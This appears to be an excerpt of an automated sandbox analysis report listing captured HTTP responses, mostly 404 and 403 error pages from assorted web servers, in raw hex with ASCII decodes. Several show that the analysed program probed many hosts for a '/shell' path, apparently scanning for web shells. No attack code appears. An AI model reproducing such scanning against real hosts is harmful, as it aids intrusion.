Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Mon, 01 Nov 2021 09:09:22 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenConnection: Keep-AliveContent-Type: text/htmlTransfer-Encoding: chunkedDate: Mon, 01 Nov 2021 09:09:22 GMTServer: LiteSpeedData Raw: 32 37 36 31 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 4
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:09:25 GMTServer: ApacheContent-Length: 196Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:13:03 GMTServer: Apache/2.2.27 (CentOS)Content-Length: 278Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 32 2e 32 37 20 28 43 65 6e 74 4f 53 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p><hr><address>Apache/2.2.27 (CentOS) Server at 127.0.0.1 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:09:25 GMTServer: Apache/2.4.34 (Ubuntu)Content-Length: 278Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 34 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p><hr><address>Apache/2.4.34 (Ubuntu) Server at 127.0.0.1 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: b7a4a90-990f-9817-78e4-c045e1d89b2eDate: Mon, 01 Nov 2021 09:09:55 GMTCache-Control: no-cache,no-storeContent-Type: text/html; charset=%sConnection: closeData Raw: 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 20 4c 49 4e 4b 3d 22 23 32 30 32 30 66 66 22 20 56 4c 49 4e 4b 3d 22 23 34 30 34 30 63 63 22 3e 0a 3c 48 34 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 34 3e 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 6d 69 6e 69 5f 68 74 74 70 64 2f 22 3e 62 37 61 34 61 39 30 2d 39 39 30 66 2d 39 38 31 37 2d 37 38 65 34 2d 63 30 34 35 65 31 64 38 39 62 32 65 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY BGCOLOR="#cc9999" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc"><H4>404 Not Found</H4>File not found.<HR><ADDRESS><A HREF="http://www.acme.com/software/mini_httpd/">b7a4a90-990f-9817-78e4-c045e1d89b2e</A></ADDRESS></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 01 Nov 2021 09:09:30 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:09:32 GMTServer: ApacheContent-Length: 196Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Mon, 01 Nov 2021 09:09:31 GMTContent-Length: 4880Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 38 2e 35 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Server: BitNinja Captcha ServerDate: Mon, 01 Nov 2021 09:09:33 GMTContent-Length: 13724Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6a 6f 6f 6d 6c 61 2c 20 4a 6f 6f 6d 6c 61 2c 20 6a 6f 6f 6d 6c 61 20 31 2e 35 2c 20 77 6f 72 64 70 72 65 73 73 20 32 2e 35 2c 20 44 72 75 70 61 6c 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 20 31 2e 35 20 2d 20 4f 70 65 6e 20 53 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 57 6f 72 64 50 72 65 73 73 20 32 2e 35 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 57 61 69 74 69 6e 67 20 66 6f 72 20 74 68 65 20 72 65 64 69 72 65 63 74 69 72 6f 6e 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 20 6d 61 72 67 69 6e 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 7d 0a 20 20 20 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Mon, 01 Nov 2021 09:09:34 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Language: enContent-Length: 979Date: Mon, 01 Nov 2021 09:09:34 GMTData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 36 38 20 28 55 62 75 6e 74 75 29 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 73 68 65 6c 6c 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 73 68 65 6c 6c 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 